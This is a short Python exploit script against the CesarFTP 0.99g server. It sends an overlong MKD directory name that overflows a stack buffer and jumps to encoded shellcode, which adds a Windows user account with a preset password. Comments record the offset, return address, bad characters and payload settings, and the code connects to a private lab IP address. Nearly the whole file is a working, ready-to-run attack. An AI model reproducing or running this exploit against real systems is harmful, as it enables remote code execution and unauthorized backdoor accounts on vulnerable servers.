Untitled

#!/usr/bin/python

import socket

s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)

#----------------------------------------------------------------
#EIP 674; (AAA=required for padding)
#buffer = "\n"*671 + "AAA" + "BBBB" + "C"*300  === basic buffer (=978)
#jmp esp 77D718FC - USER32.dll xp sp1
#buffer = "\n"*671 + "pattern_create(307)" ==> EIP = 3; ESP = 7
#free space for shellcode = 288
#bad chars: \ x00 \ x20 \ x0a \ x0d
#win32_adduser -  PASS=track EXITFUNC=seh USER=fast Size=235 Encoder=ShikataGaNai
#----------------------------------------------------------------

shellcode=(
"\x2b\xc9\xdb\xd3\xd9\x74\x24\xf4\xbb\x44\x73\xdf\xf9\xb1\x35\x5e"
"\x83\xc6\x04\x31\x5e\x11\x03\x1a\x62\x3d\x0c\x5e\x6c\x85\xef\x9e"
"\x6d\x8d\xb5\xa2\xe6\xed\x30\xa2\xf9\xe2\xb0\x1d\xe2\x77\x99\x81"
"\x13\x63\x6f\x4a\x27\xf8\x71\xa2\x79\x3e\xe8\x96\xfe\x7e\x7f\xe1"
"\x3f\xb4\x8d\xec\x7d\xa2\x7a\xd5\xd5\x11\x87\x5c\x33\xd2\xd8\xba"
"\xba\x0e\x80\x49\xb0\x9b\xc6\x12\xd5\x1a\x32\x27\xf9\x97\xc5\xdc"
"\x8b\xf4\xe1\x26\x4f\x35\x2a\x42\xc4\x76\x9a\x0f\x1a\x0e\xd6\x84"
"\xdb\xe3\x6d\xea\xc7\x56\xfa\x62\xf0\x43\xf4\xf9\x80\x24\x07\xfd"
"\x80\xcf\x60\xc1\xdf\xfe\x86\x59\xb6\x89\x9f\x1a\xf6\xf1\x0f\x74"
"\x07\x8f\xb4\xdb\x8f\x08\x4a\x69\x41\x7e\x4c\x8a\x3d\xed\xd6\x7a"
"\xa7\x95\x73\xa2\x08\x05\x5c\xcc\x33\xbd\xbc\x65\xcf\x58\xcf\xa5"
"\x49\xc2\x5c\xd1\xb5\x70\xd1\x78\xd5\x13\x35\x55\x58\xa0\x71\x89"
"\x7c\x0e\x5a\xa7\xe5\x3a\xba\x5b\x89\xa1\xdb\xcf\x32\x54\x73\x7a"
"\xcd\xb8\xca\xe0\x40\xd0\xa2\x81\xe9\x56\x49\x30\x7a\xf8\xdf\xc1"
"\xa2\x60\x41\x56\xd7\x4c\xae\xd9\x53\xc9\xb0")


#keeping original buffer length of 978
buffer = "\n"*671 + "AAA" + "\xFC\x18\xD7\x77" + "\x90"*16 + shellcode + "\xcc"*49

print "\nConnecting to CesarFTP 0.99g"
print "\nCreating User Account (u:fast/pw:track)"
print "\nAll your services @re belong to us..."
s.connect(('192.168.1.70' ,21))
data = s.recv(1024)
s.send('USER ftp' +'\r\n')
data = s.recv(1024)
s.send('PASS ftp' +'\r\n')
data = s.recv(1024)

s.send('MKD ' + buffer + '\r\n')
s.close()